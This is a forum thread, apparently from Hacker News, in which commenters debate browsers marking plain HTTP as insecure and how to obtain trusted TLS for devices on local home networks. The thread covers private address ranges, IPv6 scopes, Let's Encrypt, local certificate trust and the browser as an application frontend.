> Which probably means they won't bother providing an alternative mechanism. Which means (a) you can't use their devices in other setups and (b) their users are locked into such setups, which makes it impossible for, say, router vendors, to build more useful networking products that use the full potential of IP.
That's a load of conjecture. I'm not sure how to respond except with a bunch of other conjecture, so I'll refrain.
> So on one hand you believe that supporting one standard will necessarily come at the cost of supporting another (I don't),
So, you think vendors who have covered 99%+ of their userbase with a solution will generally also implement an alternative that is way more complicated for the remaining 1%?
> and you agree that what I suggested might cover 99%+ of the current user base, yet you favor a solution that depends on global addresses, something which definitely doesn't come close to 99% of potential users?
No, I favor a solution that does not depend on the global (non-)routability of an address, i.e., a solution that works for 100% of users.
> Well, if you want to be really anal about it you could call them "addresses which fall into one of the address ranges allocated for private use", but you're just splitting hairs.
But that is still equally misleading. There is nothing "private" about those addresses, and in particular nothing "more private" than globally routable addresses. Anyone can use those addresses, all the RFC essentially says is that you won't collide with addresses allocated by RIRs, but they might collide with other administrative domains that choose to use the same prefix. That doesn't mean that you cannot use them on a WAN, or between companies, or really anywhere where you can agree with all participating networks on the allocations. All it means is you have to expect collisions if you connect previously separate administrative domains, and that you cannot expect yout ISP to announce them for you on the public internet, that's it.
Also, just as you can use non-globally routable addresses between networks, you can use globally routable addresses for private networks, and you should if you can (which in practice means when you build an IPv6 network): Even if you build a network that is not intended to be connected to the internet at all, if you do have a globally routable IPv6 prefix allocated for your organization, you should number that network with addresses from that prefix.
> There is no guarantee, but that's different from saying that it's inherently unsafe.
No, it's actually not. "unsafe" does not mean "you will hurt yourself", it means "it has not been established that you won't hurt yourself".
> It's a reflection on how the internet is built. It doesn't matter that in the ideal network, everything might have an address, when pretty much every device is behind some kind of NAT. IPv6? Come back when it's widely adopted.
So, for the question of how to achieve (as close as possible to) an ideal network, it doesn't matter what the ideal network would look like?! Or do you think we should just wait until device vendors have screwed up IPv6 before we try to enforce some sensible policy?
> It stopped mattering because of address exhaustion and slow adoption of IPv6. Now, NAT is an integral part of the internet. I'm not trying to justify it or state this as a matter of preference—I'd definitely prefer having a ton of IPv6 addresses over the single IPv4 address I actually have—I'm just laying things out as they are, and how they are for the vast majority of consumers.
So ... because noone uses IPv6, you suggested to use ULA as an indicator for security?! I am not sure I follow ...
> No. Flagging a website as "safe" when it can not be established that it is safe is at least as wrong as flagging it as "unsafe" when it can not be established as being unsafe.
No, you don't establish "unsafety", that is the default assumption. The only way to establish that something is unsafe is to show after the fact that someone got hurt, which is just completely useless as a security mechanism.
> What I'm suggesting, not flagging it in any particular way at all, would be taking a neutral stance.
Wouldn't a neutral stance be to instead display a security status of "security unknown" (which is obviously equivalent to insecure)? "Not flagging it in any particular way" simply means that the user makes an assumption one way or another, not that the user thinks "it is unknown whether this is secure".
> IMO, the practice of calling HTTPS sites "secure" is itself potentially misleading to consumers. It is only secure in a very specific sense, likely not in the broader sense a layman would consider.
Well, yeah, but that is not really relevant to the question about warning about an insecure situation. Just because there are insecure situations that you cannot warn about, does not mean that therefore warning about other insecure situations isn't useful. Really, it makes much more sense to warn about insecure situations (which means, situations not known to be secure against certain types of attacks deemed relevant in the respective context) than to in display anything that says "this is secure", as security is alway relative to specific attacks, not a global property.
> The question I stop at is "why is my browser supposed to know that?"
Because your browser should help you protect your personal data that you process using your browser? I mean, I don't think it should know that, it should just enforce the same encryption requirements everywhere, but you seem to disagree with that because there are networks where your personal data is secure without encryption--in which case, your browser would either have to give up the goal of protecting your personal data, or it would have to know about which parts of your network are secure without encryption.
> Both a way of verifying and distributing certificates network-wide in a LAN and for those certificates to be usable globally.
Well, that would be a pairing mechanism then?! (Which still should not overload global routability with security semantics.)
> The premise of my suggestion is that the browsers won't back down from indiscriminately marking plain HTTP sites as insecure, hence "Perhaps a rather drastic change like this will lead to more user friendly ways to install self-signed certificates on home networks."—so suppose they would support such a method. Would that be better or worse than current practice?
It depends on the mechanism? Yes, centralized certificate management for your own devices would be useful, but it should not in any way overload the routability of addresses. If you want to use the LAN as a semi-trusted key exchange mechanism, that probably should happen at the ethernet layer. Or maybe with a one-hop TTL on the IP layer. You have to detect whether you are on the same LAN, not whether you are using an RFC1918/ULA prefix, because not all LANs use RFC1918/ULA, and nor all RFC1918/ULA are limited to a LAN, let alone a trusted LAN.
> That's a load of conjecture. I'm not sure how to respond except with a bunch of other conjecture, so I'll refrain.
It is mostly an observation of what always happens in such situations.
> So, you think vendors who have covered 99%+ of their userbase with a solution will generally also implement an alternative that is way more complicated for the remaining 1%?
Not necessarily, but the designer of a standard could take both use cases into account.
> No, I favor a solution that does not depend on the global (non-)routability of an address, i.e., a solution that works for 100% of users.
What, more precisely? Of course taking into consideration that 100% of users might not even have an internet connection. One thing I'd like is for devices to a their key signature printed on a sticker. Then I can verify the signature, log in and generate a new key and password, generate a certificate that I can install myself or sign up with a service like Let's Encrypt.
> But that is still equally misleading. There is nothing "private" about those addresses, and in particular nothing "more private" than globally routable addresses.
No, it's not misleading to say that they are allocated for private use. Your ISP drops connections to these addresses because they respect RFC1819 and don't route to the private address ranges. Even if they didn't, these address ranges are still allocated for private use, and your ISP is Wrong. They're only routable in the sense that IP would technically allow it, but the internet is not simply IP but a collection of standards and best practices.
And sure, "private" has a very broad meaning. A browser could very well flag a certificate that was distributed from a private address as such and let the user decide whether they trust that source.
> Also, just as you can use non-globally routable addresses between networks, you can use globally routable addresses for private networks, and you should if you can (which in practice means when you build an IPv6 network): Even if you build a network that is not intended to be connected to the internet at all, if you do have a globally routable IPv6 prefix allocated for your organization, you should number that network with addresses from that prefix.
Sure. But again, "in practice means when you build an IPv6 network", i.e. not a typical consumer, for how long more? In an enterprise there are already many different ways to solve the problem of authentication, certificate signing and encryption. Consider that the average internet user doesn't even have a registered domain name or a static IP allocation.
> No, it's actually not. "unsafe" does not mean "you will hurt yourself", it means "it has not been established that you won't hurt yourself".
So everything on the web should be flagged by the browser as unsafe? I don't know how the browser can ever safely establish that I won't hurt myself. "Unsafe" and "safe" are two sides of a subjective, blurry line, at best a reasonable assumption and at worst an arbitrary handwave.
IMO, the browser is taking what should be exact descriptions of the nature of the connection and water them down to vague, misleadingly simplified concepts. The browser could tell me that my connection to a site is unencrypted, that it is encrypted with an uncertified key, or that it's not encrypted, and when you click them they could show a help text describing what that means exactly, the possible consequences of using the service and details on the key and certificate if applicable. When I click the "Secure" badge in Chrome, I don't even get to see which CA signed it, or a public key.
"Secure" and "Insecure" mean just that, rather impossible things for a browser to verify, and something that a user unfamiliar with the underlying technology may interpret as an authoritative rating of the provider of the service as a whole, when in reality there are many more aspects to take into a count in deciding whether a site is secure or insecure.
> So, for the question of how to achieve (as close as possible to) an ideal network, it doesn't matter what the ideal network would look like?!
Well, it involves IPv6, we can start there. We're talking about a new security policy that a major browser seems to want to implement shortly, definitely much more shortly than full IPv6 rollout.
> Or do you think we should just wait until device vendors have screwed up IPv6 before we try to enforce some sensible policy?
This is a very loaded question, given that we still disagree on whether a solution that works well both for globally routable and NATed devices is possible.
> So ... because noone uses IPv6, you suggested to use ULA as an indicator for security?! I am not sure I follow ...
I never said that no one uses IPv6, so I agree that you don't follow.
> No, you don't establish "unsafety", that is the default assumption. The only way to establish that something is unsafe is to show after the fact that someone got hurt, which is just completely useless as a security mechanism.
Let's say that I see your ladder. It's broken, so I tell you that it's unsafe. Unreasonable assumption? You take it down and bring another ladder. I don't see it, but I tell you it's unsafe. You see it and can clearly say that it isn't. Is it unsafe? Is it reasonable for me to tell you that it is unsafe? "Unsafety" isn't the default assumption that a browser makes (and with regards to plain HTTP in particular still isn't in the version of Chrome I'm using).
> Wouldn't a neutral stance be to instead display a security status of "security unknown" (which is obviously equivalent to insecure)? "Not flagging it in any particular way" simply means that the user makes an assumption one way or another, not that the user thinks "it is unknown whether this is secure".
Maybe that's actually the better option. But no, "security unknown" in that sense is not equivalent to insecure. As an extreme, I could create a network with an Ethernet cable between two off-grid devices that I control in a faraday cage. On the other end of the extreme, someone could be tapping a cable far away from my computer and figure out what connections I make regardless of encrypted data. Somewhere in between the two extremes, close to the likely, the party that I establish a secure connection too could be sharing our communication with other parties.
> Because your browser should help you protect your personal data that you process using your browser?
We've already established that the browser can't know it, so is the browser a fundamentally flawed concept?
> Well, that would be a pairing mechanism then?! (Which still should not overload global routability with security semantics.)
Yes? The only part you seem to disagree with is the possibility of having a router in a local network (and yes, local networks exist) facilitate and streamline the exchange.
> If you want to use the LAN as a semi-trusted key exchange mechanism, that probably should happen at the ethernet layer.
So again, a perfect application for a router? The router is in a perfect position to verify that I am on its network.
> It is mostly an observation of what always happens in such situations.
Yes, as evident from the absolute lack of overlapping authentication and encryption standards...
> On the other end of the extreme, someone could be tapping a cable far away from my computer and figure out what connections I make regardless of encrypted data. Somewhere in between the two extremes, close to the likely, the party that I establish a secure connection too could be sharing our communication with other parties.
Which is in no way in conflict with saying "this is insecure". That is in conflict with saying "this is secure", because that implies "... against this specific set of threats", which is not understood by the average user. So, yes, I agree, browsers should generally avoid telling users that something "is secure", but it is perfectly fine to say "this is insecure".
> We've already established that the browser can't know it, so is the browser a fundamentally flawed concept?
No, it's just a subjective entity as all entities in the world are, and so it has to determine risks based on incomplete information, as all entities in the world have to. Also, it's not strictly true that it cannot know that, but it cannot know that without you telling it. It might well be possible to have an option where you could tell your browser "this set of addresses is safe to talk to unencrypted and unauthenticated".
> Yes? The only part you seem to disagree with is the possibility of having a router in a local network (and yes, local networks exist) facilitate and streamline the exchange.
No, I disagree primarily with overloading the semantics of "private addresses", and with mechanisms that only allow communication in a local network. "private addresses" is neither reliably indicative of nor a required property of "within the same local network".
But also, a mechanism that does not depend on being on the same local network for pairing would be preferable.
> So again, a perfect application for a router? The router is in a perfect position to verify that I am on its network.
OK ... how?
> Yes, as evident from the absolute lack of overlapping authentication and encryption standards...
... implemented in the same product, where one of them would always have been enough to meet the requirements of 99% of potential users, and the others would have taken considerably more effort to implement?
> Not necessarily, but the designer of a standard could take both use cases into account.
Which doesn't help if it's a separate mechanism. If 1% of the work gets you to the goal in 99% of the cases, that's what vendors will do. Whether that fulfills the requirements of some standard or not does not matter.
> What, more precisely?
I am not making any suggestions as to the solution.
> Of course taking into consideration that 100% of users might not even have an internet connection.
So, if the device is one that does not inherently need global internet connectivity to be useful, then, yeah, things should work without global internet connectivity.
> One thing I'd like is for devices to a their key signature printed on a sticker. Then I can verify the signature, log in and generate a new key and password, generate a certificate that I can install myself or sign up with a service like Let's Encrypt.
Well, a fixed key is a problem, but other than that, yeah, an out-of-band path for key exchange sounds good.
> No, it's not misleading to say that they are allocated for private use. Your ISP drops connections to these addresses because they respect RFC1819 and don't route to the private address ranges. Even if they didn't, these address ranges are still allocated for private use, and your ISP is Wrong. They're only routable in the sense that IP would technically allow it, but the internet is not simply IP but a collection of standards and best practices.
OK, let's get this straight: What does "private" mean? It's a word with a whole lot of only partially overlapping definitions. For the purposes of this discussion, it is important to distinguish the aspect of "independent from official entities" from the aspect of "not revealed to the public", i.e. "providing privacy". RFC1918 addresses are only private in the former sense: You can allocate and use them without coordinating with RIRs or your ISP. However, they have absolutely nothing to do with the latter sense of providing privacy. That is why it is misleading to call them "private addresses": People understand that to mean that they are defined to provide some sort of secrecy or privacy or protection from the public or something along those lines, which they don't. It's not wrong, because there is a different meaning of "private" that fits exactly what RFC1918 are defined to be used for, but it is misleading because it leads people to assume that it encompasses more than that.
Also, whether ISPs do it or not doesn't really matter. What matters is that RFC1918 address space is in fact routed between networks that are not intended to trust each other. And that is perfectly within the uses intended in RFC1918. The RFC isn't concerned with home networks, really, but with "enterprises", and it defines "an enterprise" to be the scope of an RFC1918 allocation. Nowhere does it say that that implies any sort of trust or security relationship between machines within such an allocation. And also, in practice, it is common to link RFC1918 networks of different "enterprises" together, as a sort-of "meta-enterprise", where a trust relationship is even less likely.
The only thing that is "private" about RFC1918 addresses is that you can allocate them without coordination with IANA/RIRs/ISPs, and that you cannot expect an ISP to route them for you on the global internet. There is no privacy specified in the RFC.
> And sure, "private" has a very broad meaning. A browser could very well flag a certificate that was distributed from a private address as such and let the user decide whether they trust that source.
How does it matter for this whether the address is "private" (i.e., allocated without coordination with IANA/RIRs/ISPs)?
> Sure. But again, "in practice means when you build an IPv6 network", i.e. not a typical consumer, for how long more?
Erm, most IPv6 use is by consumers, with ~ 20% adoption based on google users?! Not sure whether that's quite "typical" yet, but certainly not unusual either. Most user devices support IPv6, and increasingly, ISPs are rolling out IPv6 to their customers with new subscriptions, which tends to come with new routers, which means that at that point their network is using IPv6 for all services that support it.
> Well, it involves IPv6, we can start there. We're talking about a new security policy that a major browser seems to want to implement shortly, definitely much more shortly than full IPv6 rollout.
Yes, and that is the only way to do it. If you wait until after full IPv6 rollout, you will have to work around assumptions that device vendors by then will have made based on the browser's behaviour, which means it only gets harder to implement. If you want to have any hope of success, you have to act now, when your actions can shape what device vendors will do.
> This is a very loaded question, given that we still disagree on whether a solution that works well both for globally routable and NATed devices is possible.
You have so far failed to even show a solution that works better for NATed devices than non-NATed ones.
> I never said that no one uses IPv6, so I agree that you don't follow.
Replace "noone" with "essentially noone" if you want to get my point.
> Let's say that I see your ladder. It's broken, so I tell you that it's unsafe. Unreasonable assumption? You take it down and bring another ladder. I don't see it, but I tell you it's unsafe. You see it and can clearly say that it isn't. Is it unsafe? Is it reasonable for me to tell you that it is unsafe?
Unsafety is not a(n objective) property of the ladder, it's a (subjective) state of your knowledge. The ladder will only either fail or not (that is an objective fact about the ladder). Even a ladder with partially broken steps might still hold up, and a ladder that is all new and shiny can still have some manufacturing defect that causes it to fail on first use. The former is good to use, the latter is not. But that is a useless concept if your goal is to minimize harm because you only know that after the fact. So, what we use instead is a concept of "unsafety". Statements about unsafety are an expression of our knowledge about something. So, the ladder with broken steps is considered unsafe, because based on what we generally know about the statistical properties of ladders with broken steps, they are known to have an increased failure rate. But then, you might apply load tests to that ladder and establish that it does carry the loads required reliably if you avoid the obviously broken steps, in which case it can be considered not unsafe. Mind you, nothing has changed about the ladder, only our knowledge about it has changed. Similarly for the new and shiny ladder, those are generally considered not unsafe because of what we statistically know about new and shiny ladders, and maybe about how ladders are tested after manufacturing. But then, you could test that as well, and maybe find that it breaks apart under light load, at which point you would change to considering it unsafe. Again, nothing has changed about the ladder, it's all about the knowledge you have about it. And the tests I suggested are not the end of that process of discovering the unsafety of a thing. You might still do other tests yet and come to yet another conclusion (like, I dunno, the testing conditions were unnecessarily harsh, and under more realistic usage conditions the opposite conclusion is appropriate).
Now, not knowing anything about the ladder is just another state of knowledge. And if your goal is to minimize harm, then the default is not to assume safety. Again, that is in no way a statement about the ladder. That does not mean the ladder won't hold up. That only means that the ladder is not known (to you!) to hold up. It is always and exclusively a statement about your knowledge about the ladder.
This is not about answering the question "will the ladder fail?", this is about answering the question "is it known to the best of our understanding that the ladder will not fail under some generally expected load conditions?". If the answer to that is "no", then that is reason to be cautious, and that is why the browser warns you/is going to warn you.
You can of course argue that your goal is not to minimize harm, in which case the default assumption does not apply ... but then the whole discussion is pointless, as you are then essentially just saying "if you don't care about minimizing harm, there is no problem with trusting unencrypted connections (of some sort or another)". True, but not my goal, and obviously also not the goal of those people implementing the change.
> Maybe that's actually the better option. But no, "security unknown" in that sense is not equivalent to insecure. As an extreme, I could create a network with an Ethernet cable between two off-grid devices that I control in a faraday cage.
Yes, you could. But the browser doesn't know that. Therefore, its subjective determination is "this is not known to me to protect your private data", and that is what it is telling you. If you know better, that's fine, but the browser doesn't, so it warns you. If you don't know better, you better should listen to what your browser is telling you if your goal is to minimize harm. If you do know better, why do you care that your browser warns you based on its incomplete knowledge about the world?
A) Scopes aren't a hack they're part of the protocol.
B) Scopes are exactly: "the global internet and the home".
Considering those things why should it be absurd if I want to secure my home scope at the application layer too? IPv6 is literally designed to allow for this. Browsers are the things that are being stubborn.
If IPv6 is just a terrible collection of hacks then we need a new version and fast before everyone get stuck on v6 for the next 50 years....
In IPv6 one interface has many addresses. Each one can have:
1. global addresses,
2. rotating temporary global addresses,
3. universal local addresses (one for each site), and
4. a link-local address (required).
The first 3 now technically reside in the global scope. ULAs used to be called site-local and had their own scope, but they were restructured to basically be fancy UUIDs and their scope abolished and merged with the global scope. Link-local is still its own scope.
Although both are globally scoped, there's a difference between a global IPv6 address and a ULA. The global is globally routeable and prefixes are organized regionally and delegated to allow hierarchical routing while ULAs have arbitrary prefixes (not suitable for global routing) and are not supposed to be forwarded to interfaces outside their subnet.
So to answer your question, for local communications in your home that you didn't want leaving your network, you would use ULAs. You could use link-local addresses if your home was all on the same l2 link, but the generally preferred solution is to use ULAs so you don't leak protocol details upwards and so you can leverage l3 tunnels.
Local DNS is allowed to respond with ULAs, just not servers participating in the global authoritative DNS. If you want DNS on your home site you simply run a local DNS server that resolves your local names and is configured to forward unknown names to the global DNS.
IPv6 kills NAT, so "scoped" addresses step in to fill the void and are overall a much better solution.
OK, so? Where exactly do you think are those things specified? Or do you expect me to re-read all IPv6 RFCs only to then repeat those questions because I still don't know where they are specified?
It would require you to run outside services to support it, but you could most certainly rig something together that lets each "installation" claim randomsubdomain.domainyoucontrol.com, phone home with the local network IP of the "installation", phone home the Lets Encrypt DNS-01 details, and then get a valid certificate for a domain that points to the local instance.
Interestingly the german lawyers association build a software that does nearly this. Just with a small design change that made it a total flaw:
To communicate out of a https secured web mailer to a local IP and Port where a security card reader driver would respond they registered bealocalhost.de which resolves to 127.0.0.1. To prevent mixed content errors they then shipped the private key for a https certificate for bealocalhost compiled into the card reader driver.
Obviously after someone noticed that the cert got instantly revoked...
That is like, way way WAY less secure than just using an unencrypted connection, as now my requests are being alerted over DNS to some third party who has the ability to trivially hijack my connections off to the Internet at large.
The owner of domainyoucontrol can simply rebind randomsubdomain and generate a new cert.
There is no way to build a device with HTTPS that allows the user to distrust the maker of the device.
Edit: before I get responses "you can never distrust the maker" — on HTTP I can audit the device, install it, and keep it in the local network forever, trusting it for decades. On HTTPS it needs to be online every 3 months, and the owner could very well intercept it at that time.
Ah, the maker, fair enough. Still, there is, although not for free: the device can let you configure a subdomain of your own domain, and then use LE (with the DNS challenge) to get a cert. That still requires trusting your DNS provider, of course.
It requires internet connection every 3 months, it requires trusting the DNS provider, and it requires having a domain.
It'd be much better if DANE would already be supported, as the DHCP server can send you to a DNS resolver returning key info for local IPs, which in turn could use the corresponding certs.
How would that protocol work? I'm not seeing how the DNS resolver would securely get the key info from the device. What if an attacker cloned the device's MAC and said to the resolver "hi, my new key is X"?
Why? The whole point of authentication and encryption is to allow secure communications over insecure networks. So what if DHCP is unencrypted? If you have E2E auth/encryption, all a malicious DHCP server can do is prevent your communications, it can't spy or MITM them.
If you have E2E auth/encryption, all a malicious DHCP server can is, indirectly, identifying every site you connect to, and potentially blocking you from accessing some sites. Or all. It can intercept all unencrypted stuff. This includes NTP, which in turn means your computer’s clock will be set wrong, which in turn means it can give you long distrusted certificates whose private keys have leaked.
TL;DR: If you can MitM a system at the root, you can already break basically anything relevant.
Yes, they can block me, but that's just annoying, not insecure. Intercepting unencrypted stuff is the reason for this whole thread. And if they change my computer's date, they might get one malicious cert working - assuming they can change it enough, since NTP has mechanisms for avoiding large leaps - but they'll break every single HTTPS connection besides that one, which I'm sure the user would notice almost immediately.
Meanwhile, routers are generally known to be insecure, and who knows how many viruses my guests bring onto my Wifi network when they ask to connect.
If you control the local DNS server, you can install a certificate for localserver.example.com, then have the server return a local IP for localserver.example.com
It’s not impossible to obtain a SSL certificate for a local connection. You can add an entry for fictional domain that maps to localhost in your hosts file and then self-sign a certificate and install it.
but for users of NAS type devices, we've gone from an easy http web page to change the config to needing to install a custom certificate and change the localhosts file...
I sort of have the reverse problem. I would like to use a websocket to connect to an insecure host on the local network from a secure context. I realise that this is incredibly niche and would probably need independent confirmation through the browser to prevent abuse. But it's needed to connect to a local weechat instance from Glowing Bear, which is essentially a web UI for WeeChat, an IRC client: https://github.com/glowing-bear/glowing-bear. Right now we have an https and a non-https-version of the website, which is arguably even worse.
If you have a web service counterpart you should consider looking into webrtc... the sdp exchange can happen through your site and then they will connect directly
That's a valid point, and something like this might be a solution (i.e. serving the client JS from a public site with valid TLS certificate and connecting to the local network from there) -- however, I don't want my application to be dependent on an internet connection. This is something you should be able to run in the literal lonely cabin in the woods.
You could use service workers to aggressively cache the client for offline use. And maybe have an insecure version served from the application as a fallback.
Your problem is isolated to local development servers, which can be easily excepted from blocking non-HTTPS sites. The potential privacy/security gains totally outweigh the inconvenience of seeing "Not Secure" in the URL bar of your browser on an app you are developing.
This isn't as big of a problem as you'd like to believe. IMHO.
Sorry for not being clear enough in my initial post. I'm not talking about a development server. I'm talking about the end product being a server. For example in the form of a user-friendly executable that is natively running on your Windows/Linux/macOS Desktop, a Mobile device, or (alternatively) a single-board computer such as a Raspberry Pi. The end-users using this are not developers. They are just normal users running a simple piece of software that provides them with a web-frontend for a service in their home-network. No internet connection required whatsoever.
So, how do I build an IoT device that never sends a single packet outside of my LAN, which my grandma could have set up and run without ever seeing a security warning, and which does not show "Not Secure"?
In general, how can I get all the functionality e.g. a Nest device may provide, while staying purely within of my LAN?
(Disclaimer: For my own IoT projects, of course I use a special domain with DNS delegation and Let's Encrypt certificates, and HSTS preloaded)
Certificates in which the subject is one or more IP addresses rather than DNS names _are_ a thing, but not that many get issued by public CAs and almost certainly your laundry list of objections about how you don't want to require any setup or Internet connection will ensure you wouldn't be able to qualify.
The only way I see to do it the "right way" for the masses is to have the lightbulb phone-home to the manufacturer. It's a little silly, but an IoT lightbulb is silly in the first place.
Ah the fridge as a service model. Instead of buying something that just works for decades you now get to pay service fees to keep some remote server online. Oh wait the company just went under and nobody can host trusted replacement servers, guess I need a new fridge.
Right, any software that's hooked up to the internet needs to be updated over time to stay secure, therefore needing to pay for a service or having it go insecure in 2 years.
Accessing a network-connected TV or other home gadget is also "using a local server", do you really suggest people should not do this without a networking professional? That's just not going to happen.
Of course that's going to happen. It's just too dangerous to let someone without the right qualifications do it. I expect it to become a legal requirement to have a licensed technician install networks just like it is with electricity or gas.
The internet is just too important to leave to amateurs, look at how much damage badly configured home networks and computers are causing already. This stuff needs to be secured properly.
You also didn't need a drivers license when cars just became available, but now there are shitloads of cars we have to make sure drivers are capable before letting them drive. Same goes for network-connected equipment.
Also, being part of a botnet should directly impact your internet bill. I don't really see another option. It's a bit silly that nobody knows when their devices are saturating their bandwidth 24/7 because they are compromised.
That way people are then motivated to hire a professional. Also, people making devices will be motivated to not use a default "admin" password because customers will start saying "uh, this smart toaster cost me hundreds of dollars when I plugged it in."
Automate what exactly? the point is most home users access their router with 192.168.0.1, they don't have a domain name, nor are they likely to want to buy one. This is now no longer a niche thing that a few people want to do, it's a 100s millions (if not a billion) of households needing to do this to access their own router, so it doesn't say "not secure".
A ridiculous proposition given the current state of technology? Also yes.
If it happens, implemented in turnkey devices (such as SOHO routers) in a way that enhances vendor control rather than empowering home users with the option to use their own domain names and certs? Likely, that's the trend these days and doesn't show signs of receding.
The last line is kinda a tangent, but if that came to be the case, I would no longer be on board with the idea every device should have a FQDN.
You are deluding your users if you convey the idea that home networks are separated the internet. Or that traffic on a home network is safe and doesn't need TLS. Can't you just put up a domain can give your users subdomains on that?
Already thought about this. But a) the application does not require any internet connection, b) while it is possible to just get a global domain name and redirect that locally to the local server, this would require my server to hijack all DNS requests in the local network. Which I don't want to. And I don't want users having to setup DNS redirects themselves.
Edit: And don't get me wrong, I'm totally for TLS on the local network; but there should be an easy way for users to permanently mark self-signed certificates from a local address as secure.
There would be no hijacking involved, just give each of your users a normal unique subdomain that you serve from the DNS. As in, user-1.yourapp.net, user-2.yourapp.net etc.
If someone wants to run it in a network with no access to the DNS, you can just tell them to put that in their hosts file (or whatever local DNS setup they are using).
> there should be an easy way for users to permanently mark self-signed certificates from a local address as secure.
I'm not sure I agree that that's where ux need improvement. Microsoft already have a pretty "easy" solution for pushing locally trusted ca certs, but only in an "enterprise" environment.
Most/all Linux distros will allow pushing to /etc/ssl/certs/ca-certificates (via eg /usr/local/share/ca-certificates and update-ca-certificates).
But that doesn't help as long as browsers work hard to be "special", and manage their own trust.
Being able to mark some nets as trusted/local might help - both with :::1 and with vpns.
In order to be assured of something's identity, it needs an actual identity to be assured of. For things on the network, this will usually be a DNS name, so we should give them a DNS name.
You don't need to buy "domains", but certainly for a commercial project that makes loads of things which need names it would make sense to own a sub-domain to put all the names in.
You also don't need to "connect to the internet just for DNS lookup" unless you really want to. The point of using DNS names isn't that you can look them up in DNS, it's that they're are a unique hierarchy with a central authority.
There _are_ alternatives to DNS names but none of them have a trustworthy and working PKI today so you can't use them to secure anything you build. Maybe building a trustworthy PKI is hard?
If you insist upon using Let's Encrypt (which is a charitable purpose and so charges $0 for certificates) perhaps because it's actually a hobby project then yes, somebody would need to control DNS records in order to periodically prove control over each name and get issued a certificate, because that's how ACME (the protocol Let's Encrypt use) decides whether to issue.
Many other public CAs are for-profit companies and several already have _active_ commercial deals in which they issue certificates for devices in bulk to the name owner. If you're EXA Metal Poles Europe and you're making 50 000 devices named in the range pole0000.foo.example.com through poleFFFF.foo.example.com they are quite happy to issue you, the legitimate owners of example.com with 50 000 certificates for those devices in exchange for money.
At some level, a certificate is an identity. If I’ve trusted a cert then I know that anyone using it has the private key, no matter their IP or dns name. Being able to do that for a local device would be very nice—I could connect to whatever up it dhcp-ed to and be sure I was talking to the right thing.
That deserves a hard stare. If I trust the certificate on my chat server to be _the certificate for my chat server_ that doesn't suddenly make it OK to present that certificate if you're claiming to be my bank, or my operating system vendor, or Hacker News.
The local device should have a _name_ and then we can issue it a certificate for that _name_ and know we're really talking to the same thing as last time. DHCP and other address allocation protocols don't (needn't) change the name.
I think we should just take the same approach that I2P and Tor take for naming, and base the domain name on the public key. Local devices automatically get a domain like gmaf2cgbn3q2be3vaaytrev3qyxcksemkdxtzefq5bl3542uyf3q.local, which they can advertise via mDNS, and the browser accepts a self-signed certificate for a public key which matches this fingerprint just as if it were "domain validated".
The domain stays the same so long as the key does, so the user can bookmark the page for their own device and be sure that when they navigate back to that domain they're getting the same device and not some imposter—effectively making this equivalent to "trust on first use".
Edit: Changed "on the certificate" to "on the public key". It might be necessary to regenerate the certificate periodically, e.g. to update the expiration date, and that shouldn't affect the domain name.
Yes, there already is an exception for localhost. HTTP on localhost is considered a "secure context".
Edit: To be more precise, and to quote [1]
"Secure Contexts says UAs MAY treat localhost as a secure context only if they can guarantee it will only ever resolve to a loopback address (and are in any case not required to). https://w3c.github.io/webappsec-secure-contexts/#localhost"
You also could stop misusing the browser as an application frontend, and write a proper frontend with a cross-platform toolkit, and distribute that.
I don't understand why developers so often choose the browser as a frontend. Are there better rationales besides having at least some frontend for tyrant-controlled devices like iOS'es, and just using the skills one already has?
For the first, just tell the people to get proper devices.
Because of the second, I see schooling efforts for JavaScript by the tech giants so negatively. It leads to masses of people using JavaScript where it shouldn't be.
Perhaps you don’t remember back to the days before the browser was used for application front ends. The problem was no one wrote the front end on some “nice cross platform toolkit”. Instead everything was some crappy windows only app and Linux and Mac users were left out in the cold. Give me the browser any day.
If there was another way to ship an application that can be accessed in one click, in less than a second, with shareable urls, I'd be interested.
Other nice things to see: multiple independent open source implementations of the application platform; a stable and battle tested sandbox, such that users can run code from hundreds of different vendors every day without much worry about being pwned.
The web is old and hoary, but to me there isn't any comparison. For most apps I build, the second place choice isn't even close.
An incredibly obvious reason would be that it is the largest application delivery platform with the highest level of user familiarity and comfort.
If you compare two services where one of them offers you a direct login to the app and the other offers you a 200MB download, most people will choose to log in to a website. It's a better user experience. Especially for things that will see infrequent use.
If you _only_ care about the number of users, then I see a point. However, at least for non-commercial programs, why care at all about the number of users?
The scenario you are drawing is not a proper comparison. There is no reason why a native toolkit couldn't support rendering the program before it's fully loaded, so I see no reason a native program would need more data transfer upfront than a JavaScript one. Though I think too that being prompted to download the program, then install it and find the way to run it can be cumbersome, but the solution to this is to not do it this way. Why not integrate with the native way to obtain applications and make it transparent and convenient for the user?
After all, I think there might be fundamentally different goals when developing a software, and that explains the difference. If one has accepted advertisement-based financing of projects, then them and I would probably disagree in many ways. I think users devices must only and exclusively work for the user.
>You also could stop misusing the browser as an application frontend, and write a proper frontend with a cross-platform toolkit, and distribute that.
This is pure insanity. There are tons of applications built on the web stack now that are supposed to run on local networks. There has never been a requirement that "Network == Internet".
For example, enterprise software. Dynamics CRM? Dynamics NAV? Dynamics... anything? Sage CRM? Everything runs on the browser now.
Why would anyone pass up a gigantic, proven, powerful software stack that represents >90% of all applications in the world?
The error is in the stack, not that people would want to use the easiest, most powerful tool for the job.
We might as well be advocating to go back to FoxPro.
>For the first, just tell the people to get proper devices.
It must be super nice to live in a world where you can dictate what devices the clients use, as opposed to a huge investment of pre-installed devices, or, devices users bring from home.
Whatever job you've got, I want it. Because it's completely alien to my career experience.
I think it can be summed up in one old but very relevant-in-our-times quote: "Those who give up freedom for security deserve neither."
At first, the idea that something is being done "for your safety and security" sounds good, but like all utopian goals, it has deeper connotations that are truly dystopian.
As mentioned in another of the comments here, this is yet another instance of companies using the "more secure" argument to gain control over the masses and ostracise anything they don't like. They're harnessing fear and exploiting it to their advantage.
To give an analogy in the real world, we don't lock ourselves in bulletproof cages and expend great efforts in hiding from others (for the most part), and I'm sure if your car's GPS indicated locations with high crime rates as "not safe" and prevented you from going there, there would be much outrage. We shouldn't let companies and (and try very hard, unfortunately not always succeeding for) governments dictate every detail of how we should live our lives offline, and the same should apply online.
There's a very long tail of sites, many sadly disappearing from Google[1], of old yet extremely useful information, which are probably going to stay HTTP for the forseeable future. I made a comment about this in a previous "HTTP/S debate" article:
You have javascript disabled. I do not. I happen to use plenty of sites that require javascript, with HN being one of them. Most of the users out there do not have javascript disabled either. How do you account for their security?
> and I'm sure if your car's GPS indicated locations with high crime rates as "not safe" and prevented you from going there, there would be much outrage.
